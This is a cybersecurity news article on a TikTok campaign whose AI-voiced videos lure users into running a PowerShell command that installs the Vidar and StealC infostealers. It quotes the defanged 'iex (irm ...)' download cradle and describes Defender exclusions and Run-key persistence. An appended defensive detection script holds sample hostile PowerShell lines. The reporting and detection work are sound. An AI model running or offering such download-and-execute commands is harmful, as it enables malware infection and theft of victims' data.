Cybercriminals have discovered a new frontier for malware distribution by weaponizing TikTok’s massive user base and algorithmic reach. A sophisticated social engineering campaign has emerged that leverages AI-generated videos to trick users into downloading dangerous information-stealing malware disguised as software activation tutorials. These deceptive videos promise to help users activate legitimate applications like Windows OS, Microsoft Office, CapCut, and Spotify, but instead deliver the notorious Vidar and StealC infostealers to unsuspecting victims.

Unlike conventional attacks that rely on malicious websites or email phishing, this operation embeds all social engineering elements directly within video content, making detection considerably more challenging for security solutions. The attackers capitalize on TikTok’s viral nature, with one malicious video accumulating nearly 500,000 views, over 20,000 likes, and more than 100 comments, demonstrating the campaign’s alarming reach and effectiveness.

Trend Micro analysts identified multiple TikTok accounts involved in this operation, including @gitallowed, @zane.houghton, @allaivo2, @sysglow.wow, @alexfixpc, and @digitaldreams771, all of which have since been deactivated. The researchers noted that these accounts posted strikingly similar faceless videos with AI-generated voices, suggesting an automated production process designed for scalability.

Victims are instructed to open PowerShell and execute a seemingly innocuous command: iex (irm hxxps://allaivo[.]me/spotify). This PowerShell script initiates a multi-stage infection process that demonstrates advanced evasion techniques. Upon execution, the initial PowerShell script creates hidden directories within the user’s APPDATA and LOCALAPPDATA folders, immediately adding these locations to Windows Defender’s exclusion list to prevent antivirus scanning. The script then downloads the primary payload from hxxps://amssh[.]co/file.exe, which contains either Vidar or StealC malware variants. The persistence mechanism involves downloading an additional PowerShell script from hxxps://amssh[.]co/script[.]ps1 and establishing a registry key that ensures the malware executes at system startup.

Notably, Vidar employs an innovative command-and-control strategy, abusing legitimate services like Steam profiles and Telegram channels as Dead Drop Resolvers to conceal actual C&C server addresses, making detection and takedown efforts significantly more complex. The campaign represents a significant evolution in malware distribution tactics, moving away from traditional web-based delivery methods to exploit the trust and engagement inherent in social media platforms.

Tushar is a cyber security content editor with a passion for creating captivating and informative content. With years of experience under his belt in cyber security, he covers cyber security news, technology and other news.
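The infection chain described above (a PowerShell download cradle, staging directories under APPDATA/LOCALAPPDATA, a Windows Defender exclusion for those directories, and a Run-key entry for persistence) is a good candidate for correlation-based detection, because each step looks mundane on its own but the sequence on one host within minutes is distinctive. The following Python script is an added example, not code from the article or from Trend Micro: it tags PowerShell script block log records (Event ID 4104 text) with the stage they match and escalates a host only when several stages cluster inside a short window. The hosts, domains and paths in the sample records are constructed placeholders, and the rule names, the ten-minute window and the severity scheme are this example's own choices.

```python
import re
from collections import defaultdict
from dataclasses import dataclass, field
from datetime import datetime, timedelta

# Constructed sample of PowerShell script block log records (Event ID 4104),
# flattened to "host|timestamp|script text". Hosts, domains and paths are
# placeholders made up for this example, not indicators from any real campaign.
SAMPLE_EVENTS = [
    "WS01|2025-06-27T10:01:03|Get-ChildItem C:\\Users\\alice\\Documents",
    "WS01|2025-06-27T10:02:11|iex (irm https://activator.example.invalid/spotify)",
    "WS01|2025-06-27T10:02:12|New-Item -ItemType Directory -Path $env:APPDATA\\svc -Force",
    "WS01|2025-06-27T10:02:13|Add-MpPreference -ExclusionPath $env:APPDATA\\svc, $env:LOCALAPPDATA\\svc",
    "WS01|2025-06-27T10:02:15|Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -Name svc -Value powershell.exe",
    "WS02|2025-06-27T10:05:40|Invoke-RestMethod https://api.internal.example/health",
    "WS02|2025-06-27T10:06:02|Add-MpPreference -ExclusionPath C:\\BuildAgent\\work",
]

# One pattern per stage of the chain. Each is weak on its own (administrators
# add exclusions and call Invoke-RestMethod legitimately); the signal comes
# from several stages landing on one host in quick succession.
RULES = {
    "download_cradle": re.compile(
        r"\b(iex|invoke-expression)\b.*\b(irm|invoke-restmethod|iwr|invoke-webrequest)\b", re.I),
    "defender_exclusion": re.compile(
        r"\badd-mppreference\b.*-exclusion(path|extension|process)", re.I),
    "userprofile_staging": re.compile(
        r"\$env:(appdata|localappdata)\b|\\appdata\\(roaming|local)\\", re.I),
    "run_key_persistence": re.compile(r"\\currentversion\\run\b", re.I),
}
# Stages that count toward escalation; userprofile_staging only raises severity.
STRONG_STAGES = {"download_cradle", "defender_exclusion", "run_key_persistence"}


@dataclass
class Event:
    host: str
    ts: datetime
    script: str
    tags: set = field(default_factory=set)


def parse_event(line):
    """Split one flattened record into host, timestamp and script text."""
    host, ts, script = line.split("|", 2)
    return Event(host, datetime.fromisoformat(ts), script)


def tag_event(ev):
    """Attach the name of every rule whose pattern matches the script text."""
    ev.tags = {name for name, rx in RULES.items() if rx.search(ev.script)}
    return ev


def analyze_chain(lines, window=timedelta(minutes=10)):
    """Tag every record, then look per host for the largest set of distinct
    strong stages that fall inside one `window`. Returns host -> finding."""
    by_host = defaultdict(list)
    for line in lines:
        ev = tag_event(parse_event(line))
        if ev.tags:
            by_host[ev.host].append(ev)

    findings = {}
    for host, evs in by_host.items():
        evs.sort(key=lambda e: e.ts)
        best = set()
        for i, start in enumerate(evs):  # sliding window over tagged events
            stages = set()
            for ev in evs[i:]:
                if ev.ts - start.ts > window:
                    break
                stages |= ev.tags & STRONG_STAGES
            if len(stages) > len(best):
                best = stages
        if not best:
            continue  # only context tags (e.g. a path under APPDATA): no finding
        # An exclusion pointed at the user's own profile is the hallmark of
        # this chain, so it lifts a multi-stage hit from medium to high.
        profile_excluded = any(
            {"defender_exclusion", "userprofile_staging"} <= ev.tags for ev in evs)
        if len(best) >= 2:
            severity = "high" if profile_excluded else "medium"
        else:
            severity = "low"
        findings[host] = {"stages": sorted(best), "severity": severity}
    return findings


if __name__ == "__main__":
    for host, finding in analyze_chain(SAMPLE_EVENTS).items():
        print(host, finding["severity"], ", ".join(finding["stages"]))
```

Run against the sample, WS01 is reported as high (download cradle, Defender exclusion and Run-key persistence within four seconds, with the exclusion aimed at the user's profile), while WS02's lone exclusion on a build directory stays at low for an analyst to triage rather than firing an alert on its own. In a real deployment the records would come from the Microsoft-Windows-PowerShell/Operational log or an EDR's script telemetry, and the `iex (irm ...)` pattern is worth a standalone alert on hosts where no administrator is expected to run download cradles at all.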
This Cyber News was published on cybersecuritynews.com. Publication date: Fri, 27 Jun 2025 14:45:10 +0000